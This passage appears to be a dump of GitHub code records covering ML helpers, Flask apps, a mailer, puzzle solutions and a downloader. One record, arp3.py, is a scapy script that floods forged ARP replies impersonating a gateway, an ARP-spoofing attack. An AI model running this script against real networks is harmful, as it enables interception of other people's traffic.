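One small asymmetry in the virtual-memory helpers above: the read paths unpack with '=I'/'=H'/'=B' (native byte order, standard sizes) while the write paths pack with 'I'/'H'/'B' (native order, native sizes and alignment). For these fixed-width integers the bytes come out the same on common platforms, but using the '=' forms on both sides would make the pairing explicit:

import struct

# Symmetric round-trip: pack and unpack with the same '=I' format.
buf = struct.pack('=I', 0xDEADBEEF)
assert struct.unpack('=I', buf)[0] == 0xDEADBEEF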
at the observations is minimized\n        self.weights = torch.linalg.solve(self.internal_dist, self.y)\n\n    def predict(self, X):\n        # Kernel distances between inputs and grid\n        dist = self.kernel(\n            self.X,\n            self._to_tensor(self.x_scaler.transform(X), dtype=self.X.dtype),\n            epsilon=self.epsilon,\n        )\n        # Matrix multiply the weights for each interpolated point by the distances\n        zi = torch.matmul(self.weights, dist).cpu().numpy()\n        # Cast back to original space\n        zi = self.y_scaler.inverse_transform(zi.reshape(-1, 1)).reshape(\n            -1,\n        )\n        return zi\n","repo_name":"stanbiryukov/Nyx","sub_path":"nyx/torch/interpolate.py","file_name":"interpolate.py","file_ext":"py","file_size_in_byte":2972,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"19"}
+{"seq_id":"18533379438","text":"# encoding: utf-8\n\nfrom marrow.mailer.exc import TransportExhaustedException\n\n\n__all__ = ['ImmediateManager']\n\nlog = __import__('logging').getLogger(__name__)\n\n\n\nclass ImmediateManager(object):\n    def __init__(self, config, Transport):\n        self._Transport = Transport\n        self._transport = None\n        \n        super(ImmediateManager, self).__init__()\n    \n    @property\n    def transport(self):\n        if not self._transport:\n            self._transport = self._Transport()\n            self._transport.startup()\n        \n        return self._transport\n    \n    def startup(self):\n        log.info(\"Immediate delivery manager starting.\")\n        \n        self.transport # This will trigger startup automatically.\n        \n        log.info(\"Immediate delivery manager started.\")\n    \n    def deliver(self, message):\n        try:\n            result = self.transport.deliver(message)\n        \n        except TransportExhaustedException:\n            log.debug(\"Transport exhausted, retrying.\")\n            self.transport.shutdown()\n            # Drop the cached transport so the property rebuilds a fresh one,\n            # then propagate the retry's result to the caller.\n            self._transport = None\n            return self.deliver(message)\n        \n        return message, result\n    \n    def shutdown(self):\n        log.info(\"Immediate delivery manager stopping.\")\n        \n        self.transport.shutdown()\n        \n        log.info(\"Immediate delivery manager stopped.\")\n","repo_name":"mcdonc/marrow.mailer","sub_path":"marrow/mailer/manager/immediate.py","file_name":"immediate.py","file_ext":"py","file_size_in_byte":1307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"19"}
+{"seq_id":"9908868310","text":"# Import module and packages\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom utils.variables import *\n\n\n# Standard CNN ResNet block architecture\nclass ResBlock(nn.Module):\n    \"\"\"\n    A class for a standard Residual Network block\n\n    Structure:\n    - conv1: the first 2D convolutional layer\n    - bn1: 2D batch normalization\n    - conv2: the second 2D convolutional layer\n    - bn2: 2D batch normalization\n\n    Method:\n    - __init__: initialize a class with n_channels (in_channels and out_channels)\n    - forward: perform forward propagation through the residual block and return output\n    \"\"\"\n\n    def __init__(self, n_channels):\n        super(ResBlock, self).__init__()\n        # Conv1 3x3 stride 1 pad 1 in_channel = out_channel\n        self.conv1 = nn.Conv2d(in_channels=n_channels, out_channels=n_channels, kernel_size=3, stride=1, padding=1,\n                               bias=True)\n        self.bn1 = nn.BatchNorm2d(n_channels)\n        # Conv2 3x3 stride 1 pad 1 in_channel = out_channel\n        self.conv2 = nn.Conv2d(in_channels=n_channels, out_channels=n_channels, kernel_size=3, stride=1, padding=1,\n                               bias=True)\n        self.bn2 = nn.BatchNorm2d(n_channels)\n\n    def forward(self, x):\n        # Perform feed forward propagation through the residual block\n        # x -> Conv1 -> bn1 -> ReLU -> Conv2 -> bn2 -> ReLU (with shortcut)\n        shortcut = x\n        x = F.leaky_relu(self.bn1(self.conv1(x)))\n        x = 
F.leaky_relu(self.bn2(self.conv2(x)) + shortcut)\n return x\n","repo_name":"ChayutWo/license-plate-recogition","sub_path":"models/resblock.py","file_name":"resblock.py","file_ext":"py","file_size_in_byte":1537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"30685933179","text":"from datetime import datetime\nfrom uuid import UUID\n\nfrom sqlalchemy.exc import IntegrityError\nfrom sqlmodel import select\nfrom sqlmodel.ext.asyncio.session import AsyncSession\n\nfrom conchalabs.user_audios.errors import UserAudioConflictError, UserAudioNotFoundError\nfrom conchalabs.user_audios.models import UserAudio\nfrom conchalabs.user_audios.repositories.base import UserAudioRepository\n\n\nclass PostgresUserAudioRepository(UserAudioRepository):\n def __init__(self, session: AsyncSession):\n self._session = session\n\n async def save(self, user_audio: UserAudio) -> UserAudio:\n user_audio.updated_at = datetime.utcnow()\n\n self._session.add(user_audio)\n\n try:\n await self._session.commit()\n except IntegrityError as error:\n raise UserAudioConflictError() from error\n\n await self._session.refresh(user_audio)\n\n return user_audio\n\n async def find(self, filters: dict) -> list[UserAudio]:\n query = select(UserAudio)\n\n for field, val in filters.items():\n query = query.where(getattr(UserAudio, field) == val)\n\n user_audios = await self._session.execute(query)\n return user_audios.scalars().all()\n\n async def get_by_id(self, user_id: UUID, audio_id: UUID) -> UserAudio:\n query = select(UserAudio).where(\n (UserAudio.id == audio_id) & (UserAudio.user_id == user_id)\n )\n\n result = await self._session.execute(query)\n audio = result.scalars().first()\n\n if audio is None:\n raise UserAudioNotFoundError()\n\n return audio\n","repo_name":"lucascb/conchalabs-api","sub_path":"conchalabs/user_audios/repositories/postgres.py","file_name":"postgres.py","file_ext":"py","file_size_in_byte":1597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"28947569181","text":"import numpy as np\n\nimport torch\nimport os\nimport torch.nn as nn\nimport torch.optim as optim\nimport torchvision.datasets as dset\nfrom torch.utils.data.sampler import SubsetRandomSampler\n\nfrom torchvision import transforms\n\nclass PyTorchHelper:\n\n def __init__(self, batch_size, data):\n self.output = 'output'\n self.batch_size = batch_size\n self.data = data\n self.device = torch.device(\"cuda:0\") # Let's make sure GPU is available!\n\n def split(self, validation_split):\n\n data_size = self.data.data.shape[0]\n split = int(np.floor(validation_split * data_size))\n indices = list(range(data_size))\n np.random.shuffle(indices)\n\n train_indices, val_indices = indices[split:], indices[:split]\n\n return train_indices, val_indices\n\n def load_model(self, model_name, model):\n\n checkpoint = torch.load(self.output + '/' + model_name)\n model.load_state_dict(checkpoint['model_state_dict'])\n\n loss_history = checkpoint['loss_history']\n train_history = checkpoint['train_history']\n val_history = checkpoint['val_history']\n\n for i in range(len(val_history)):\n print(\"Average loss: %f, Train accuracy: %f, Val accuracy: %f\" % (loss_history[i], train_history[i], val_history[i]))\n\n return loss_history, train_history, val_history\n\n def save_model(self, model_name, model, loss_history, train_history, val_history):\n\n if not os.path.exists(self.output):\n os.makedirs(self.output)\n\n torch.save({\n 'model_state_dict': 
model.state_dict(),\n 'loss_history': loss_history,\n 'train_history' : train_history,\n 'val_history': val_history\n }, self.output + '/' + model_name)\n\n return 0\n\n def train_model(self, model_name, model, train_loader, val_loader, loss, optimizer, num_epochs, scheduler=None):\n\n if os.path.isfile(self.output + '/' + model_name):\n return self.load_model(model_name, model)\n\n loss_history = []\n train_history = []\n val_history = []\n for epoch in range(num_epochs):\n model.train() # Enter train mode\n\n loss_accum = 0\n correct_samples = 0\n total_samples = 0\n for i_step, (x, y) in enumerate(train_loader):\n x_gpu = x.to(self.device)\n y_gpu = y.to(self.device)\n prediction = model(x_gpu)\n loss_value = loss(prediction, y_gpu)\n optimizer.zero_grad()\n loss_value.backward()\n optimizer.step()\n\n _, indices = torch.max(prediction, 1)\n correct_samples += torch.sum(indices == y_gpu)\n total_samples += y.shape[0]\n\n loss_accum += loss_value\n\n if scheduler is not None:\n scheduler.step()\n\n ave_loss = loss_accum / i_step\n train_accuracy = float(correct_samples) / total_samples\n val_accuracy = self.compute_accuracy(model, val_loader)\n\n loss_history.append(float(ave_loss))\n train_history.append(train_accuracy)\n val_history.append(val_accuracy)\n\n print(\"Average loss: %f, Train accuracy: %f, Val accuracy: %f\" % (ave_loss, train_accuracy, val_accuracy))\n\n self.save_model(model_name, model, loss_history, train_history, val_history)\n return loss_history, train_history, val_history\n\n def compute_accuracy(self, model, loader):\n \"\"\"\n Computes accuracy on the dataset wrapped in a loader\n\n Returns: accuracy as a float value between 0 and 1\n \"\"\"\n model.eval() # Evaluation mode\n # TODO: Copy implementation from previous assignment\n # Don't forget to move the data to device before running it through the model!\n\n total_samples = 0\n correct_samples = 0\n for i_step, (x, y) in enumerate(loader):\n x_gpu = x.to(self.device)\n y_gpu = y.to(self.device)\n\n prediction = model(x_gpu)\n\n _, indices = torch.max(prediction, 1)\n\n total_samples += y.shape[0]\n correct_samples += torch.sum(indices == y_gpu)\n\n return float(correct_samples) / total_samples\n","repo_name":"Chularev/courses","sub_path":"dl_on_fingers/assignments/assignment3/pytorch_helper.py","file_name":"pytorch_helper.py","file_ext":"py","file_size_in_byte":4285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"70928194603","text":"from flask import Flask, render_template, request, redirect, url_for, flash, jsonify\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\nfrom database_setup import Base, Cruise\n\napp = Flask(__name__)\n\nengine = create_engine('sqlite:///curise.db')\nBase.metadata.bind = engine\n\nDBSession = sessionmaker(bind=engine)\nsession = DBSession()\n\n@app.route('/')\ndef index():\n curises = session.query(Cruise).order_by(Cruise.date)\n return render_template('index.html', curises = curises)\n\n@app.route('/cheap')\ndef cheap():\n curises = session.query(Cruise).order_by(Cruise.price)\n return render_template('index.html', curises = curises) \n\nif __name__ == '__main__':\n app.secret_key = 'super_secret_key'\n app.debug = True\n app.run(host='0.0.0.0', 
port=5000)","repo_name":"carchi8py/Vacation-Scraper","sub_path":"vacation/webpage.py","file_name":"webpage.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"32007877190","text":"#!/bin/python3\nimport requests\nimport sys\nfrom urllib.parse import unquote\nfrom bs4 import BeautifulSoup as bs\n\n# URI = \"https://cloud.piracy.wiki/KnightLiteKing/[AnimeKuro] Family Guy [x265 10-bit HEVC] [KLK]/[AnimeKuro] Family Guy Season 15 [480p] [KLK]\"\n\nURI = 'https://pauladaunt.com/books/'\n\n\"\"\"\n    Signature: \n        String -> String\n    Purpose:\n        Take a String URL and Sends an HTTP Request to that URL and parse the returned html\n        and return a string representation of that html page\n\"\"\"\n\ndef grab_html(url):\n    res = requests.get(url)\n    return res.text\n\ndef download_file(url, content):\n    parsed_html = bs(content, features=\"lxml\")\n    anchor_tags = parsed_html.body.findAll(\"a\")\n\n    for a in anchor_tags:\n        if(a.attrs['href'].endswith('.mp4')):\n            print(\"downloading {0}\".format(a.attrs['href']))\n            req = requests.get(url + \"/\" + a.attrs['href'])\n            f = open(a.attrs['href'], 'wb')\n            f.write(req.content)\n            f.close()\n        else:\n            print(\"Skipping {0} ...\".format(a.attrs['href']))\n\n\ndef main():\n    try:\n        if(len(sys.argv) != 2):\n            print(\"Usage: {0} <url>\".format(sys.argv[0]))\n            exit(-1)\n\n        url = unquote(sys.argv[1])\n        # grabbing html\n        print(\"Scanning the Html Page ...\")\n        content = grab_html(url)\n\n        # downloading the files\n        print(\"Starting to Download the files ...\")\n        download_file(url, content)\n    except Exception:\n        print(\"error occurred\")\n    except KeyboardInterrupt:\n        print(\"Bye Bye ya Monsef\")\n\nmain()","repo_name":"ahmedmagdy492/Download-All-Files-Script","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"16487699000","text":"# coding=utf-8\nfrom json import dumps\nfrom plone.memoize.view import memoize_contextless\nfrom Products.Five.browser import BrowserView\nfrom zope.i18nmessageid import MessageFactory\n\n\npl_message = MessageFactory('plonelocales')\npae_message = MessageFactory('plone.app.event')\n\n\nclass I18nJSONView(BrowserView):\n    '''\n    I am the date-picker-i18n.json view class\n\n    Use me like this:\n    \n    '''\n\n    @memoize_contextless\n    def __call__(self):\n        translate = self.context.translate\n        json = dumps({\n            \"previousMonth\": translate(pae_message(\"prev_month_link\")),\n            \"nextMonth\": translate(pae_message(\"next_month_link\")),\n            \"months\": [\n                translate(pl_message(month)) for month in [\n                    \"month_jan\",\n                    \"month_feb\",\n                    \"month_mar\",\n                    \"month_apr\",\n                    \"month_may\",\n                    \"month_jun\",\n                    \"month_jul\",\n                    \"month_aug\",\n                    \"month_sep\",\n                    \"month_oct\",\n                    \"month_nov\",\n                    \"month_dec\",\n                ]\n            ],\n            \"weekdays\": [\n                translate(pl_message(weekday)) for weekday in [\n                    \"weekday_sun\",\n                    \"weekday_mon\",\n                    \"weekday_tue\",\n                    \"weekday_wed\",\n                    \"weekday_thu\",\n                    \"weekday_fri\",\n                    \"weekday_sat\",\n                ]\n            ],\n            \"weekdaysShort\": [\n                translate(pl_message(weekday_abbr)) for weekday_abbr in [\n                    \"weekday_sun_abbr\",\n                    \"weekday_mon_abbr\",\n                    \"weekday_tue_abbr\",\n                    \"weekday_wed_abbr\",\n                    \"weekday_thu_abbr\",\n                    \"weekday_fri_abbr\",\n                    \"weekday_sat_abbr\",\n                ]\n            ],\n        })\n        return 
json\n","repo_name":"ploneintranet/ploneintranet","sub_path":"src/ploneintranet/layout/browser/date_picker.py","file_name":"date_picker.py","file_ext":"py","file_size_in_byte":2157,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"19"} +{"seq_id":"21569638847","text":"class Solution:\n def networkDelayTime(self, times: List[List[int]], n: int, k: int) -> int:\n graph = defaultdict(list)\n distances = {node: float('inf') for node in range(1, n+1)}\n distances[k] = 0\n visited = set()\n\n for u, v, w in times:\n graph[u].append((v, w))\n \n while len(visited) != n:\n # Find the node with the smallest distance\n min_node = None\n min_distance = float('inf')\n for node in distances:\n if distances[node] < min_distance and node not in visited:\n min_node = node\n min_distance = distances[node]\n \n if not min_node:\n break\n # Mark it as visited\n visited.add(min_node)\n\n # Update the the distances of neighbor nodes\n for neighbor, times in graph[min_node]:\n distances[neighbor] = min(distances[neighbor], (distances[min_node] + times))\n\n return max(distances.values()) if len(visited) == n else -1","repo_name":"wctseng99/leetcode-record","sub_path":"0744-network-delay-time/0744-network-delay-time.py","file_name":"0744-network-delay-time.py","file_ext":"py","file_size_in_byte":1077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"42027002769","text":"# coding:utf-8\nimport argparse\nfrom scapy.all import *\nimport threading\n\nparser = argparse.ArgumentParser()\nthreads = []\n\n\ndef send_pack(arp):\n sendp(arp, iface='eth0')\n\n\ndef main():\n parser.add_argument('-gateway', action='store', dest='gateway_ip', type=str, help=u'请输入网关ip地址')\n parser.add_argument('-targetm', action='store', dest='target_mac', type=str, help=u'请输入目标主机mac地址')\n parser.add_argument('-targeti', action='store', dest='target_ip', type=str, help=u'请输入目标主机ip地址')\n arg = parser.parse_args()\n source_mac = get_if_hwaddr('eth0')\n arp = Ether(src=source_mac, dst=arg.target_mac) / ARP(hwsrc=source_mac, psrc=arg.gateway_ip, hwdst=arg.target_mac,\n pdst=arg.target_ip, op=2)\n\n while (1):\n t = threading.Thread(target=send_pack, args=arp)\n t.start()\n threads.append(t)\n for i in threads:\n t.join()\n\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"merlinxcy/python","sub_path":"scapy/arp3.py","file_name":"arp3.py","file_ext":"py","file_size_in_byte":1009,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"26080890066","text":"from common import read_data, display_result\n\n\ndef find_n_first_uniques(n_uniques, data):\n index = -1\n upper_search_limit = len(data) - n_uniques + 1\n for i in range(0, upper_search_limit):\n potential_packet = data[i:i + n_uniques]\n uniques_in_packet = set(potential_packet)\n if len(uniques_in_packet) == n_uniques:\n index = i + n_uniques\n break\n\n return index\n\n\ndef run():\n data = read_data(1, test=False)\n\n # ----------- PART 1 ----------- #\n index_packet = find_n_first_uniques(4, data)\n display_result(1, index_packet)\n\n # ----------- PART 2 ----------- #\n index_message = find_n_first_uniques(14, data)\n display_result(2, index_message)\n\n\nif __name__ == '__main__':\n run()\n","repo_name":"OlofSjogren/AdventOfCode","sub_path":"2022/day_6/day_6.py","file_name":"day_6.py","file_ext":"py","file_size_in_byte":757,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} 
+{"seq_id":"20206866097","text":"from collections import Counter, defaultdict\nfrom typing import List, DefaultDict\n\nDATA = \"\"\"abc\n\na\nb\nc\n\nab\nac\n\na\na\na\na\n\nb\"\"\"\n\n\nAnswers = DefaultDict[str, str]\n\n\ndef get_answer(raw: str) -> Answers:\n answer = defaultdict(lambda: \"no\")\n for char in set(raw.replace(\"\\n\", \"\")):\n answer[char] = \"yes\"\n return answer\n\n\ndef get_answer2(raw: str) -> Answers:\n answer = defaultdict(lambda: \"no\")\n num_people = len(raw.split(\"\\n\"))\n for char in set(raw.replace(\"\\n\", \"\")):\n if raw.count(char) == num_people:\n answer[char] = \"yes\"\n return answer\n\n\ndef count_answers(answers: List[Answers]) -> int:\n values = []\n for ans in answers:\n values.extend(list(ans.values()))\n counter = Counter(values)\n return counter[\"yes\"]\n\n\nanswers = [get_answer(raw) for raw in DATA.split(\"\\n\\n\")]\nassert count_answers(answers) == 11\n\nanswers2 = [get_answer2(raw) for raw in DATA.split(\"\\n\\n\")]\nassert count_answers(answers2) == 6\n\n\nwith open(\"data/day06.txt\") as f:\n data = f.read()\n answers = [get_answer(raw) for raw in data.split(\"\\n\\n\")]\n print(count_answers(answers))\n\n answers2 = [get_answer2(raw) for raw in data.split(\"\\n\\n\")]\n print(count_answers(answers2))\n","repo_name":"fursovia/adventofcode2020","sub_path":"day06.py","file_name":"day06.py","file_ext":"py","file_size_in_byte":1218,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"16886642230","text":"import os\nimport shutil\nimport pandas as pd\nimport csv\nfrom pytimedinput import timedInput\nimport sys\nimport subprocess\nfrom datetime import datetime\nfrom dotenv import load_dotenv\n\nload_dotenv()\n\nNaveUsed = eval(os.getenv('NaveUsed'))\nNavePicoIP = os.getenv('NavePicoIP')\nNaveClientPicoIP = os.getenv('NaveClientPicoIP')\nChancelUsed = eval(os.getenv('ChancelUsed'))\nChancelPicoIP = os.getenv('ChancelPicoIP')\nChancelClientPicoIP = os.getenv('ChancelClientPicoIP')\n\nPicourl = pd.Series( [NavePicoIP, NaveClientPicoIP, ChancelPicoIP, ChancelClientPicoIP], \\\n index=['Nave', 'NaveClient', 'Chancel', 'ChancelClient'])\n\nLINE_UP = '\\033[1A'\nLINE_CLEAR = '\\x1b[2K'\nBOLD = '\\033[1m'\nGhostFile = \"/home/pi/shared/Ghost.csv\"\n\ndef SaveFile(df,FileName):\n with open(GhostFile, 'w') as csv_file:\n df.to_csv(path_or_buf=csv_file, index = False)\n shutil.copyfile(GhostFile,FileName)\n\ndef GetFile(filename):\n return pd.read_csv(filename)\n\ndef my_int(text,mx):\n try: y = int(text)\n except: y = mx+1\n return(y)\n\ndef MyInput(text,ml):\n userText, timedOut = timedInput(text, timeout=120, maxLength = ml)\n if timedOut:\n sys.exit()\n return userText \n \ndef LineUpandClear(i):\n for j in range(i):\n print(LINE_UP, BOLD, end=LINE_CLEAR)\n\ndef GetNumber(flag,text,mn,mx):\n y = -1\n while y > mx or y < mn:\n if flag:\n y = my_int(MyInput(text,6),mx)\n else:\n y = my_int(input(text),mx)\n if y > mx or y < mn:\n LineUpandClear(1)\n return y\n","repo_name":"agt361/HeatingServer","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1535,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"38645928401","text":"from app import app\nfrom flask import render_template, request, redirect, session\nfrom flask_login import login_user, current_user, login_required, login_manager, logout_user\nfrom os.path import splitext, join \nfrom werkzeug.exceptions import NotFound\n\n\nfrom app.db import 
query\nfrom app.models.podcast import getAllEpisodesInPodcast, getAllPodcasts\nimport app.models.user as user\nimport app.models.episode as episode\nimport app.models.podcast as podcast\nimport app.models.comment as comment\nfrom app.common import savefile, timestampToString, rake_extractor as getKeywords\n\nlogin_manager.login_view = \"/login\"\n\n# Basic endpoints knowledge:\n# /* usually accepts a GET request and displays a page\n# /api/* usually accepts a POST request and redirect to other pages, or at most displays an error\n# /p/* is the user profile endpoint\n# /pod/* is the podcast endpoint\n# /pod/*/* is the episode endpoint\n\n@app.errorhandler(NotFound)\ndef notfound_handler(e=NotFound):\n return render_template(\"404.html\"), 404\n\n@app.route('/signup')\ndef signup():\n return render_template(\"signup.html\")\n\n@app.route('/api/signup', methods=[\"POST\"])\ndef api_signup():\n usr = user.User(\n username=request.form[\"username\"],\n password=request.form[\"password\"],\n is_creator=True if request.form[\"is_creator\"] == 'on' else False,\n display_name=request.form[\"display_name\"]\n )\n if(usr.username == '' or usr.password == '' or usr.display_name == ''):\n return redirect(session[\"history\"].get(-1) + \"?err=1000\")\n res = user.createUserIfAvailable(usr)\n if(res == user.USER_CREATED):\n return redirect(\"/login\")\n elif (res == user.USERNAME_NOT_AVAILABLE):\n return redirect(\"/signup?err=1001\")\n\n@app.route('/login')\ndef login():\n return render_template(\"login.html\")\n\n@app.route('/api/login', methods=[\"POST\"])\ndef api_login():\n username = request.form.get(\"username\")\n password = request.form.get(\"password\")\n res = user.verifyCredentials(username, password)\n if username == '' or res == user.INVALID_USERNAME:\n return redirect(session[\"history\"].get(0) + \"?err=1002\")\n elif password== '' or res == user.PASSWORD_MISMATCH:\n return redirect(session[\"history\"].get(0) + \"?err=1003\")\n \n usr = user.getUserByUsername(username)\n login_user(usr, True)\n return redirect(\"/\")\n\n@app.route(\"/api/signout\")\ndef signout():\n logout_user()\n session['last_played']['ep'] = None\n session['last_played']['pod'] = None\n session['last_played']['meta'] = {\n 'is_playing': False,\n 'current_time': 0,\n 'tickid': 0\n }\n return redirect(\"/\")\n\n@app.route(\"/\")\ndef home():\n data = dict()\n\n sql = \"SELECT * FROM episode ORDER BY release_date DESC\"\n all_episodes = [episode.rowToObject(r) for r in query(sql)]\n data[\"episode\"] = dict()\n for e in all_episodes: data[\"episode\"][(e.podcast_podcastid, e.episodeid)] = e\n data[\"latest\"] = [(e.podcast_podcastid, e.episodeid) for e in all_episodes[0:10]]\n\n sql = \"SELECT * FROM podcast\"\n all_podcasts = [podcast.rowToObject(r) for r in query(sql)]\n data[\"podcast\"] = dict()\n for p in all_podcasts:\n data[\"podcast\"][p.podcastid] = p\n data[\"similar\"] = []\n data[\"user\"] = dict()\n for p in data[\"podcast\"]:\n data[\"user\"][data[\"podcast\"][p].user_username] = user.getUserByUsername(data[\"podcast\"][p].user_username)\n if(current_user.is_authenticated):\n # Get all categories of all podcasts followed\n categories = [podcast.getPodcastById(p).category for p in user.getUserByUsername(current_user.username).getFollowingPodcasts()]\n # flatten list\n categories = [c for elem in categories for c in elem]\n # Get all episodes of all podcasts with some of those categories\n similar = [pod.getAllEpisodes() for pod in list(filter(lambda p : any(chk in p.category for chk in categories), 
podcast.getAllPodcasts()))]\n        # flatten list\n        similar = [e for p in similar for e in p]\n        data["similar"] = [(e.podcast_podcastid, e.episodeid) for e in similar]\n    return render_template("home.html", data=data)\n\n@app.route("/subscriptions")\n@login_required\ndef subscriptions():\n    usr = user.getUserByUsername(current_user.username)\n    following = [podcast.getPodcastById(f) for f in usr.getFollowingPodcasts()]\n    data = list()\n    for f in following:\n        data.append({\n            'podcast_meta': f,\n            'episodes_data': f.getAllEpisodes()\n        })\n    return render_template("subscriptions.html", data=data)\n\n@app.route("/categories")\ndef categories():\n    categories = [i["name"] for i in query("SELECT name FROM category", ())]\n    data = list()\n    for c in categories:\n        episodes = list(filter(lambda e : c in podcast.getPodcastById(e.podcast_podcastid).category, episode.getAllEpisodes()))\n        data.append({\n            'category': c,\n            'episodes': [{\n                'episode_meta': e,\n                'podcast_meta': podcast.getPodcastById(e.podcast_podcastid)\n            } for e in episodes]\n        })\n    return render_template("categories.html", data=data)\n\n@app.route("/me")\n@login_required\ndef me():\n    usr = user.getUserByUsername(current_user.username)\n    following = [podcast.getPodcastById(str(p)) for p in usr.getFollowingPodcasts()]\n    created = podcast.getPodcastByUsername(usr.username)\n    return render_template("profile.html", user=current_user, following=following, getUserByUsername=user.getUserByUsername, created=created)\n\n@app.route('/p/', defaults={'username': ''})\n@app.route("/p/<username>", methods=["GET"])\ndef profile(username):\n    usr = user.getUserByUsername(username)\n    following = [podcast.getPodcastById(str(p)) for p in usr.getFollowingPodcasts()]\n    created = podcast.getPodcastByUsername(usr.username)\n    return render_template("profile.html", user=usr, following=following, getUserByUsername=user.getUserByUsername, created=created)\n\n@app.route("/new")\n@login_required\ndef new():\n    if not current_user.is_creator:\n        return redirect("/")\n    created = [podcast.rowToObject(q) for q in query("SELECT * FROM podcast WHERE user_username = ?", (current_user.username,))]\n    categories = podcast.getAllCategories()\n    return render_template("new.html", created=created, categories=categories)\n\n@app.route("/api/new/podcast", methods=["POST"])\n@login_required\ndef newpodcast():\n    if not current_user.is_creator:\n        return "Not found.", 404\n    if(request.form["newpodcast_description"] == None or request.form["newpodcast_title"] == None):\n        return redirect(session["history"].get(-1) + "?err=1004")\n    \n    categories = list(filter(lambda k : "cat-" in k , request.form.keys()))\n    if(len(categories) == 0):\n        return "Select a category", 500\n\n    if "image" in request.files["newpodcast_thumbnail"].mimetype:\n        f = request.files["newpodcast_thumbnail"]\n        filename = str(abs(hash(f.filename))) + splitext(f.filename)[-1]\n        savefile(f, join("images", filename))\n    else:\n        filename = "pod_default.jpg"\n\n    \n    p = podcast.createNew(request.form["newpodcast_description"], request.form["newpodcast_title"], filename, current_user.username, categories)\n    if(p == podcast.ERR_COULD_NOT_CREATE):\n        return redirect(session["history"].get(-1) + "?err=1005")\n    return redirect(f"/pod/{p.podcastid}")\n\n@app.route('/pod/', defaults={'podcastid': ''})\n@app.route("/pod/<podcastid>", methods=["GET"])\ndef podcastview(podcastid):\n    pod = podcast.getPodcastById(podcastid)\n    if(pod == None):\n        return notfound_handler()\n    ep = pod.getAllEpisodes()\n    creator = 
user.getUserByUsername(pod.user_username)\n    is_following = current_user.is_authenticated and query("SELECT * FROM following WHERE podcast_podcastid = ? AND user_username = ?", (pod.podcastid, current_user.username,)) != []\n    return render_template("podcast.html", pod=pod, ep=ep, creator=creator, is_following=is_following, timestampToString=timestampToString, getKeywords=getKeywords)\n\n@app.route('/api/follow/', defaults={'podcastid': ''})\n@app.route('/api/follow/<podcastid>', methods=["POST"])\n@login_required\ndef follow(podcastid):\n    if int(podcastid) in user.getUserByUsername(current_user.username).getFollowingPodcasts():\n        query("DELETE FROM following WHERE user_username = ? AND podcast_podcastid = ?", (current_user.username, podcastid,))\n    else: \n        query("INSERT INTO following VALUES(?, ?)", (current_user.username, podcastid,))\n    return redirect(session["history"].get(0))\n\n@app.route("/api/new/episode", methods=["POST"])\n@login_required\ndef newepisode():\n    if not current_user.is_creator:\n        return "Not authorised.", 401\n    if(request.form["newepisode_description"] == None or request.form["newepisode_title"] == None or request.form["newepisode_podcastid"] == None or request.files["newepisode_track"].content_length > 0):\n        return redirect("/pod/" + request.form["newepisode_podcastid"] + "?err=1004")\n    if(podcast.getPodcastById(request.form["newepisode_podcastid"]).user_username != current_user.username):\n        return redirect("/pod/" + request.form["newepisode_podcastid"] + "?err=1006")\n    \n    f = request.files["newepisode_track"]\n    if("audio" not in f.mimetype):\n        return "ERROR: Data mismatch", 500\n    ext = splitext(f.filename)[-1]\n    e = episode.createNew(request.form["newepisode_podcastid"], request.form["newepisode_title"], request.form["newepisode_description"], ext)\n    savefile(f, join("audio", e.track)) \n    if(e == episode.ERR_COULD_NOT_CREATE):\n        return redirect("/pod/" + request.form["newepisode_podcastid"] + "?err=1005")\n    return redirect(f"/pod/{e.podcast_podcastid}/{e.episodeid}")\n\n\n@app.route('/pod//', defaults={'podcastid': '', 'episodeid': ''})\n@app.route("/pod/<podcastid>/<episodeid>", methods=["GET"])\ndef episodeview(podcastid, episodeid):\n    try:\n        ep = list(filter(lambda e : int(e.episodeid) == int(episodeid), episode.getEpisodeByPodcastid(podcastid)))[0]\n    except:\n        return notfound_handler()\n    comm = ep.getComments()\n    pod = podcast.getPodcastById(ep.podcast_podcastid)\n    comments = list()\n    for c in comm:\n        comments.append({\n            'comment_data': c,\n            'user_data': user.getUserByUsername(c.user_username)\n        })\n    is_following = current_user.is_authenticated and len(list(filter(lambda f : f == pod.podcastid, user.getUserByUsername(current_user.username).getFollowingPodcasts()))) > 0\n    return render_template("episode.html", ep=ep, comments=comments, pod=pod, is_following=is_following, timestampToString=timestampToString)\n\n@app.route('/api/new/comment', methods=["POST"])\n@login_required\ndef newcomment():\n    content = request.form["content"]\n    username = current_user.username\n    podcastid = request.form["podcastid"]\n    episodeid = request.form["episodeid"]\n    if(content == None or podcastid == None or episodeid == None):\n        return redirect(session['history'].get(0) + '?err=1004')\n    if(comment.createNew(podcastid, episodeid, username, content) == comment.ERR_COULD_NOT_CREATE):\n        return redirect(session['history'].get(0) + '?err=1005')\n    return redirect(session['history'].get(0))\n\n@app.route('/play/<podcastid>/<episodeid>', 
